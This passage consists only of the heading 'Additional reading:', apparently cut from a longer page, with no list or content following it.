Additional reading: